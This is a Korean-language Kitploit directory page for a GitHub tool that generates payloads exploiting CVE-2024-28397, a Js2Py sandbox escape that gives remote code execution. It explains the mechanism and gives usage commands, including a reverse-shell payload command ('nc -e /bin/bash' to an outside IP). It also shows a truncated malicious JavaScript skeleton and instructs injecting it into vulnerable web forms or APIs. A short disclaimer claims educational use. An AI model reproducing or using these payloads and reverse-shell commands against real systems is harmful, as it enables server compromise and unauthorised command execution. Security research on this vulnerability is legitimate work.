Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

CVE-2024-28397을 위한 전문 익스플로잇: Js2Py 샌드박스 이스케이프로 인한 원격 코드 실행(RCE). 모듈형 페이로드 생성을 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기웹사이트
2127개월 전아직 검토되지 않음

Technical Briefing Preview

💡 심층 분석: 전체 기술 브리핑(PDF)을 읽으려면 여기를 클릭하세요.

CVE-2024-28397: Js2Py 샌드박스 탈출 페이로드 생성기

Python License CVE

CVE-2024-28397을 위한 전문 페이로드 생성기입니다. 이 도구는 js2py 샌드박스(<= 0.74 버전)를 탈출하고 대상 시스템에서 임의의 명령을 실행하도록 설계된 악성 JavaScript 코드를 생성합니다.

🚨 취약점 세부 정보

  • CVE ID: CVE-2024-28397
  • 영향을 받는 구성 요소: Js2Py <= 0.74
  • 영향: 원격 코드 실행(RCE) / 샌드박스 탈출
  • 메커니즘: JavaScript 환경 내에서 Python의 subprocess.Popen 클래스에 접근하기 위해 Object.getOwnPropertyNames를 악용합니다.

🚀 사용 방법

이 스크립트는 취약점을 악용하는 데 필요한 정확한 JavaScript 페이로드를 생성합니다. 이 도구를 사용하기 위해 js2py를 설치할 필요는 없습니다.

1. 페이로드 생성

피해자 시스템에서 실행하려는 명령과 함께 스크립트를 실행하세요.

root@kitploit:~
# Generate payload to run 'id'
python3 exploit.py -c "id"
root@kitploit:~
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"

2. 대상 공격

도구가 생성한 출력을 복사하여 취약한 애플리케이션(예: js2py가 파싱하는 웹 양식, API 엔드포인트 또는 구성 파일)에 주입하세요.

주입 예시: 웹사이트가 사용자 입력을 받아 js2py.eval_js(user_input)로 실행하는 경우, 생성된 코드를 붙여넣으면 해당 서버에서 사용자의 명령이 실행됩니다.

📝 예시

root@kitploit:~
$ python3 exploit.py -c "whoami"

    var output = "Initial";
    try {
        var leaked_wrapper = Object.getOwnPropertyNames({});
        // ... (full malicious code) ...
        var res = Popen("whoami", ...).communicate();
        output = res;
    } ...
    output

👨‍💻 작성자

Ali Sünbül (xeloxa)

  • 📧 이메일: [email protected]
  • 🌐 웹사이트: xeloxa.netlify.app
  • 🐙 GitHub: @xeloxa

⚠️ 면책 조항

이 소프트웨어는 교육 및 보안 연구 목적으로만 제공됩니다. 작성자는 이 코드의 오용에 대해 어떠한 책임도 지지 않습니다. 소유하지 않은 시스템에서 테스트하기 전에 반드시 명시적 허가를 받으십시오.

도구 다운로드